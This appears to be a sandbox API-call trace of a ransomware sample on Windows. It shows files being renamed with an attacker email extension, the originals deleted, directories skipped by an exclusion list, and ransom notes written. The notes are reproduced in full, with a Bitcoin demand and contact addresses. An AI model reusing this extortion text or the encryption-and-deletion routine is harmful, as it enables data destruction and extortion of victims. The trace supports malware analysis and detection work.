	[0183.926] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.926] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0183.928] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\o54ifnl09yoy8bduwly.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 108
	[0183.928] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\o54ifnl09yoy8bduwly.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\o54ifnl09yoy8bduwly.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.929] WriteFile (in: hFile=0x390, lpBuffer=0xfe3460*, nNumberOfBytesToWrite=0x62e0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe3460*, lpNumberOfBytesWritten=0x18b358*=0x62e0, lpOverlapped=0x0) returned 1
	[0183.933] CloseHandle (hObject=0x390) returned 1
	[0183.933] CloseHandle (hObject=0x388) returned 1
	[0183.933] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\o54ifnl09yoy8bduwly.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\o54ifnl09yoy8bduwly.jpg")) returned 1
	[0183.942] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\o54ifnl09yoy8bduwly.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\o54ifnl09yoy8bduwly.jpg")) returned 0
	[0183.942] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c2d1570, ftCreationTime.dwHighDateTime=0x1d966e6, ftLastAccessTime.dwLowDateTime=0xc284b840, ftLastAccessTime.dwHighDateTime=0x1d96b6f, ftLastWriteTime.dwLowDateTime=0xc284b840, ftLastWriteTime.dwHighDateTime=0x1d96b6f, nFileSizeHigh=0x0, nFileSizeLow=0x62d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="o54ifnl09Yoy8BDUWLy.jpg", cAlternateFileName="O54IFN~1.JPG")) returned 0
	[0183.942] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0183.942] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0183.943] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P"
	[0183.943] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\*.*"
	[0183.943] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.943] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.943] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\HELP_DECRYPT_YOUR_FILES.TXT") returned 70
	[0183.944] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0183.944] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0183.944] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0183.947] CloseHandle (hObject=0x384) returned 1
	[0183.948] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.948] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.948] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0183.950] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0183.950] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0183.950] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0183.967] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0183.967] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0183.967] CloseHandle (hObject=0x384) returned 1
	[0183.968] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.968] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.968] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0183.968] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\HELP_DECRYPT_YOUR_FILES.HTML") returned 71
	[0183.968] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0183.969] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0183.969] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0183.972] CloseHandle (hObject=0x384) returned 1
	[0183.972] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.973] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.973] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.973] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0183.976] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0183.977] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0183.977] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0183.977] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0183.977] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0183.978] CloseHandle (hObject=0x384) returned 1
	[0184.001] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b4115b0, ftCreationTime.dwHighDateTime=0x1d969a8, ftLastAccessTime.dwLowDateTime=0x8728c57c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x872fe5f2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0184.001] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\*.*") returned 46
	[0184.001] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0184.002] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\zU8X 1dSMP0P\\*.*", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*") returned 0x2e
	[0184.002] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.002] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="windows") returned 0x0
	[0184.002] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.002] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="boot") returned 0x0
	[0184.002] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.002] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="system volume information") returned 0x0
	[0184.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.003] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0184.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.003] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="temp") returned 0x0
	[0184.003] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.003] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="program files") returned 0x0
	[0184.004] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.004] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="program files (x86)") returned 0x0
	[0184.004] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.004] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="appdata") returned 0x0
	[0184.004] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.004] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="application data") returned 0x0
	[0184.004] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.005] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="winnt") returned 0x0
	[0184.005] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.005] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="tmp") returned 0x0
	[0184.005] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.005] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="cache") returned 0x0
	[0184.005] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.006] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="temporary internet files") returned 0x0
	[0184.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.006] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="webcache") returned 0x0
	[0184.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.006] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="inetcache") returned 0x0
	[0184.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.007] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="nvidia") returned 0x0
	[0184.007] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.007] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="packages") returned 0x0
	[0184.007] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.007] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="cookies") returned 0x0
	[0184.007] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0184.008] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\zu8x 1dsmp0p\\*.*", lpSrch="programdata") returned 0x0
	[0184.008] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0184.008] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0184.008] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6b4115b0, ftCreationTime.dwHighDateTime=0x1d969a8, ftLastAccessTime.dwLowDateTime=0x8728c57c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x872fe5f2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0184.008] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0184.008] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8710e680, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8710e680, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x871347a4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x99b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="exmpmpcf6ejoq9s cdj.m4a.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="EXMPMP~1.SCL")) returned 1
	[0184.008] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x871a6e83, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x871a6e83, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x871cd295, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x4e50, dwReserved0=0x0, dwReserved1=0x0, cFileName="fwbkn_rdsivw.doc.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="FWBKN_~1.SCL")) returned 1
	[0184.008] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x872fe5f2, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x872fe5f2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x872fe5f2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0184.008] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x872b2133, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x872b2133, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x872fe5f2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0184.009] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87219862, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x87219862, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8723f9dc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x183c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="i j43i7a8s3av.png.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="IJ43I7~1.SCL")) returned 1
	[0184.009] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8728c57c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8728c57c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8728c57c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x62e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="o54ifnl09yoy8bduwly.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="O54IFN~1.SCL")) returned 1
	[0184.009] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8728c57c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8728c57c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8728c57c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x62e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="o54ifnl09yoy8bduwly.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="O54IFN~1.SCL")) returned 0
	[0184.009] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0184.148] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0184.149] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8678bf2c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8678bf2c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8678bf2c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xa170, dwReserved0=0x0, dwReserved1=0x0, cFileName="_1ieasqacw 4jkwjo9.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="_1IEAS~1.SCL")) returned 1
	[0184.149] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8678bf2c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8678bf2c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8678bf2c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xa170, dwReserved0=0x0, dwReserved1=0x0, cFileName="_1ieasqacw 4jkwjo9.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="_1IEAS~1.SCL")) returned 0
	[0184.149] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0184.149] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0184.150] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb8633609, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xb8633609, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1
	[0184.150] lstrcmpW (lpString1="Documents", lpString2="..") returned 1
	[0184.150] lstrcmpW (lpString1="Documents", lpString2=".") returned 1
	[0184.150] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0184.150] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0184.150] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Documents" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned="C:\\Users\\RDhJ0CNFevzX\\Documents"
	[0184.150] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents") returned="C:\\Users\\RDhJ0CNFevzX\\Documents"
	[0184.151] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
